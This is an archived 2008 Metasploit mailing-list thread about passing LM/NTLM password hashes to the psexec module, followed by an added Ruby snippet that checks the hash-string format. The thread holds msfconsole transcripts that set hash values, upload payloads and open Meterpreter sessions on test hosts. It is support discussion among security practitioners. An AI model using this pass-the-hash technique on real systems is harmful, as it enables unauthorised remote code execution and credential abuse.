Metasploit mailing list archives

Using LM and NTLM Hashes with Metasploit's psexec


From: mathewbrown at fastmail.fm (Mathew Brown)
Date: Sat, 12 Apr 2008 11:53:49 -0700

Thanks Kurt,

I was able to get it to work using Metasploit v3.1 although v3.0 gives
me the following error:

msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, the meterpreter exploit is only giving me the core api and not the
stdapi when using v3.1.  Here's an example of the output:

msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \hAKmOasU.exe...
[*] Binding to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl]
...
[*] Bound to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (KSpLNIZa -
"MzGErdEaSogkoVTptHmQWyOovKyS")...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: (KSpLNIZa -
"MzGErdEaSogkoVTptHmQWyOovKyS")
[*] You *MUST* manually delete the service file:
%SYSTEMROOT%\hAKmOasU.exe

[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Error: no response from dcerpc service
[*] Meterpreter session 1 opened (192.168.192.1:4444 ->
192.168.192.132:1033)
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel

meterpreter >

I tried using stdapi but it didn't work:

meterpreter > use stdapi
Loading extension stdapi...[-]
failure: Broken pipe ./lib/rex/io/stream.rb:40:in `syswrite'
./lib/rex/io/stream.rb:40:in `write'
./lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'
./lib/rex/post/meterpreter/packet_dispatcher.rb:92:in
`send_packet_wait_response'
./lib/rex/post/meterpreter/client_core.rb:114:in `load_library'
./lib/rex/post/meterpreter/client_core.rb:156:in `use'
./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:249:in
`cmd_use'
./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in
`each'
./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in
`cmd_use'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
./lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
./lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
./lib/rex/ui/text/shell.rb:121:in `call'
./lib/rex/ui/text/shell.rb:121:in `run'
./lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
./lib/msf/base/sessions/meterpreter.rb:170:in `_interact'
./lib/rex/ui/interactive.rb:48:in `interact'
./lib/msf/ui/console/command_dispatcher/core.rb:722:in `cmd_sessions'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
./lib/rex/ui/text/shell.rb:125:in `run'
./msfconsole:77

Any ideas?  Thanks.

On Sat, 12 Apr 2008 09:24:54 -0700, "Kurt Grutzmacher" <grutz at jingojango.net> said:
The format is LM:NTLM and the only way the library knows is by looking for
two 32-byte characters separated with a colon. What was the source of the
hashes? Any pass-the-hash technique must have the direct PW->Hash result,
anything that has been encrypted further with a nonce won't work. Also,
NTLMv2 is not yet supported so your target must negotiate to NTLMv1.

I just tried it against a Win2K3 server green install without a problem:

msf exploit(psexec) > set SMBPass
6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass =>
6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \tCmiQnDv.exe...
[*] Binding to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Bound to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: (iQjTupTr -
"MniZYWPVdyZvaRRSNZZIGe")
[*] You *MUST* manually delete the service file:
%SYSTEMROOT%\tCmiQnDv.exe

[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Error: no response from dcerpc service
[*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555)
msf exploit(psexec) >

Kurt

On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm> wrote:

Hi HD,
Thank you for your reply, but I can't seem to get it to work.  Also,
where would I get the NTLM response from?  I currently have the LM and
NTLM hashes, not responses.  I tried setting it to the LM:NTLM hash
but it failed.  I then tried it with just the NTLM hash and it also
failed.  Finally, I tried it in the :NTLM: format and it failed.
Here's an example of what it tells me (the hash isn't really important
since it's a test machine):

msf exploit(psexec) > set SMBPass
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
SMBPass =>
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
SMBPass => b9d2d4957b330b503cc792eb6a55bb1
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, how would psexec differentiate between you sending it an NTLM hash
to use for authentication and you sending it a password?  In the example
above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f?  How
would psexec know that this was an NTLM hash and not a password?  Any
ideas?  Thanks for your help.

PS.  I'm currently running Metasploit v3.1.  After the failed attempts
above, I verified that psexec works fine when I provide it with the real
password and not the LM or NTLM hashes.

On Friday 11 April 2008, H D Moore wrote:
I think you can just set SMBPass to the NTLM response and call it done
(thanks grutz!).

-HD

On Friday 11 April 2008, Mathew Brown wrote:
Hi,
After running info windows/smb/psexec in metasploit, it tells me:
"This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload."  I currently have
the LM and NTLM hashes for a valid account on a remote machine but not
the actual password.  How would I pass this information to the SMBPass
variable.  Should I just put it as LM:HASH?  Thanks.
--
  Mathew Brown
  mathewbrown at fastmail.fm


_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
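As an added illustration (not code from this thread or from Metasploit itself), here is a small Ruby classifier that applies the rule Kurt describes: SMBPass is treated as an LM:NTLM pair only when it is exactly two 32-character hex fields joined by one colon, and anything else is handled as a plaintext password, which is also the answer to Mathew's question about how a hash is told apart from a password. The regex, the hex-digit assumption, the `diagnose` helper and the sample values are my own, not the module's.

```ruby
# Added example, not Metasploit's or the thread's own code.
# Assumption: SMBPass counts as an LM:NTLM hash pair only when it is exactly
# two 32-hex-digit fields joined by a single colon; anything else is a password.
# (Consequence: a real password that happens to look like 32hex:32hex would be
# misread as a hash pair; a 32-hex string without a colon stays a password.)
HASH_FORMAT = /\A([0-9a-fA-F]{32}):([0-9a-fA-F]{32})\z/
HEX32       = /\A[0-9a-fA-F]{32}\z/

# Returns {kind: :lm_ntlm_hash, lm:, nt:} or {kind: :password}.
def classify_smbpass(value)
  m = HASH_FORMAT.match(value)
  return { kind: :password } unless m
  { kind: :lm_ntlm_hash, lm: m[1].downcase, nt: m[2].downcase }
end

# Explains why a value is or is not accepted as a hash pair, covering the
# shapes tried in the thread (pwdump-style ':::' wrapper, NTLM alone, ':NTLM:').
def diagnose(value)
  return "accepted as LM:NTLM hash pair" if classify_smbpass(value)[:kind] == :lm_ntlm_hash
  fields = value.split(":", -1)
  return "no colon, so it is sent as a plaintext password" if fields.size == 1
  if fields.size != 2
    return "#{fields.size - 1} colons instead of 1 (pwdump ':::' wrapper must be stripped)"
  end
  names = %w[LM NTLM]
  fields.each_with_index.reject { |f, _| HEX32.match?(f) }
        .map { |f, i| "#{names[i]} field has #{f.length} chars, expected 32 hex" }
        .join("; ")
end

# Constructed sample values (not the hashes quoted in the thread).
LM_SAMPLE = "a" * 32
NT_SAMPLE = "b" * 32
SAMPLES = {
  "LM:NTLM"     => "#{LM_SAMPLE}:#{NT_SAMPLE}",
  "pwdump line" => "::#{LM_SAMPLE}:#{NT_SAMPLE}:::",
  "NTLM only"   => NT_SAMPLE,
  ":NTLM:"      => ":#{NT_SAMPLE}:",
  "short NTLM"  => "#{LM_SAMPLE}:#{NT_SAMPLE[0, 31]}",
}

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each { |label, v| puts "#{label.ljust(12)} -> #{diagnose(v)}" }
end
```

Note that the "NTLM only" value in the thread is 31 hex characters, which this check would report as a length problem even if the single-field form were accepted.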
